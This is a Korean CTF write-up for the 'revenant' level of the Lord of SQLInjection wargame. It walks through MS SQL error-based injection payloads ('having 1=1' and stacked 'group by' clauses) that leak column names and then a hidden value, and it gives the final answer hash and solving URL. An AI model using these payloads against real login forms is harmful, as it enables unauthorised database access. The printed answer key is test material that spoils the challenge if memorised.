# revenant

첫 화면이다.

![](https://4149640791-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LybinW10qeKqY56a-jw%2F-M-nOSRbVB7-18huw4sw%2F-M-nOWSBMc1M_lTU_L_i%2Fimage.png?alt=media\&token=bbd30696-b6c2-49c3-9c07-897163d6b24e)

having 절 사용 시 무조건 select가 지정한 컬럼들을 모두 group by에 넣고 구문이 실행되어야한다.

여기서 발생하는 MS SQL 에러 메시지를 사용해 컬럼의 이름을 하나씩 알 수 있다.

id에 `admin' having 1=1--` 를 넣으면 결과가 아래와 같다.

![](https://4149640791-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LybinW10qeKqY56a-jw%2F-M-nU6IwvIGGnjhz68xk%2F-M-nUEBH62RpTZy4vzQK%2Fimage.png?alt=media\&token=108f2225-a64c-4696-bf7b-a598dd3b235f)

id에 `admin' group by id having 1=1--` 를 넣으면 결과가 아래와 같다.

![](https://4149640791-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LybinW10qeKqY56a-jw%2F-M-nUQzvZ1g6xDjPbV0R%2F-M-nUTt2EGDCDo2RxdOJ%2Fimage.png?alt=media\&token=b32ffc22-148a-4a34-92fd-a0830afc407f)

id에 `admin' group by id,pw having 1=1--` 를 넣으면 결과가 아래와 같다.

![](https://4149640791-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LybinW10qeKqY56a-jw%2F-M-nUfMZdMa1-4QnXHey%2F-M-nUhwryAf-yiwoSMjk%2Fimage.png?alt=media\&token=91895778-a675-49a0-9497-e306d18aa41c)

id에 `admin' group by id,pw,[45a88487] having 1=1--` 를 넣으면 결과가 아래와 같다.

![](https://4149640791-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LybinW10qeKqY56a-jw%2F-M-nUjKZIaJBNbZ9-ECX%2F-M-nUw6k-a_AO1LmEHU5%2Fimage.png?alt=media\&token=8c0fb4fc-03de-4693-a437-2a4509443c98)

id에 `admin' group by id,pw,[45a88487],[13477a35] having 1=1--` 를 넣으면 결과가 아래와 같다.

![](https://4149640791-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LybinW10qeKqY56a-jw%2F-M-nV34DVvhxD2hCwSKR%2F-M-nV59-Ql7Qe1omka_r%2Fimage.png?alt=media\&token=e3fdaf04-ba15-46f0-bcc7-a9301b7b407a)

이제 5번째 컬럼의 이름을 알았으니 그 안의 값을 알아낸다.

id에 `admin' and [9604b0c8]=1--` 를 넣으면 결과가 아래와 같다.

![](https://4149640791-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LybinW10qeKqY56a-jw%2F-M-nVcdQIDvhFLCD17Wf%2F-M-nVe_rSbPT6yhW4rNH%2Fimage.png?alt=media\&token=ce86ece5-b897-4606-9763-ef40bf741df4)

결론적으로, `$result['4']` 의 값은 `aa68a4b3fb327dee07f868450f7e1183` 이다.

<https://los.rubiya.kr/chall/revenant_05b27d7dea5f124118e48899d46e0b5b.php?pw=aa68a4b3fb327dee07f868450f7e1183> 에 접속하면 문제가 풀린다.

![](https://4149640791-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LybinW10qeKqY56a-jw%2F-M-nVt93FQ0zKpc-qAMj%2F-M-nVufnG637e_iwzWV7%2Fimage.png?alt=media\&token=9de5c82d-654c-40ce-9497-fb0c0b7abb6a)